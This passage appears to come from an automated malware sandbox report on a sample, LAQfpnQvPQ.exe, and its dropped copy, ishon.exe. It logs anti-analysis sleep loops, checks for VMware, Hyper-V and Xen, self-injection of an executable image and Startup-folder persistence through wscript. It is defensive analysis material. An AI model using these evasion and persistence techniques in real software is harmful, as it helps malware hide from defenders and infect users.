                      Source: C:\Users\user\AppData\Roaming\ishon.exe; Window / User API: threadDelayed 4438
                      Source: C:\Users\user\AppData\Roaming\ishon.exe; Window / User API: threadDelayed 5404
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412; Thread sleep time: -20291418481080494s >= -30000s
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412; Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 1816; Thread sleep count: 2068 > 30
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 1816; Thread sleep count: 6082 > 30
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96594s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96265s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -95937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -95828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -95718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep count: 35 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 6020Thread sleep count: 2211 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 6020Thread sleep count: 7621 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599669s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599526s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599179s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599072s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598624s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597968s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597859s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597749s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597640s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597153s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596779s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596637s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596093s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595984s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594561s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594230s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594089s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -593967s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -593859s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5744Thread sleep count: 3282 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5136Thread sleep count: 3123 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99853s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99749s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99625s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99427s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99303s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99137s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99015s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98905s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98797s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98687s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98467s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98357s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98015s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97906s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97796s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97687s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97468s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97359s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97250s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97140s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97031s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -96921s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -96812s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -96506s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -96375s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -96265s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep count: 41 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -37815825351104557s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5244Thread sleep count: 4438 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599812s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599702s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599593s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5244Thread sleep count: 5404 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599484s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599373s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599265s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599155s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599047s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598937s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598828s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598718s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598609s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598499s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598390s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598171s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598062s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597953s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597843s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597623s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597515s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597405s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597253s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596984s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596874s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596547s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596437s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596328s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596218s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596109s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595671s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595342s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595124s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595002s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -594875s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -594765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -594656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -594547s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -594437s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -594328s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99427Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99303Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99137Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 99015Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98905Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98797Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98687Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98578Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98467Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98357Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98234Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98125Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 98015Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97906Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97796Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97687Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97578Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97468Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97359Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97250Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97140Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 97031Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96921Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96812Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96506Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96375Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 96265Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599812Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599702Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599593Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599484Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599373Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599265Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599155Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 599047Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598937Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598828Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598718Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598609Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598499Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598390Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598281Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598171Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 598062Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597843Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597734Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597623Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597515Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597405Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 597253Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596984Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596874Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596547Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596437Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596328Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596218Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596109Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 596000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595890Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595781Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595671Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595453Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595342Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595234Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595124Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595002Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594875Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594547Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594437Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594328Jump to behavior
                      Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\
                      Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001645000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
                      Source: ishon.exe, 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: ishon.exe, 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: model0Microsoft|VMWare|Virtual
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3313003733.0000000001277000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3313643471.0000000001248000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Memory written: C:\Users\user\Desktop\LAQfpnQvPQ.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Memory written: C:\Users\user\AppData\Roaming\ishon.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Process created: C:\Users\user\Desktop\LAQfpnQvPQ.exe "C:\Users\user\Desktop\LAQfpnQvPQ.exe"
                      Source: C:\Windows\System32\wscript.exe, Process created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Process created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Queries volume information: C:\Users\user\Desktop\LAQfpnQvPQ.exe VolumeInformation
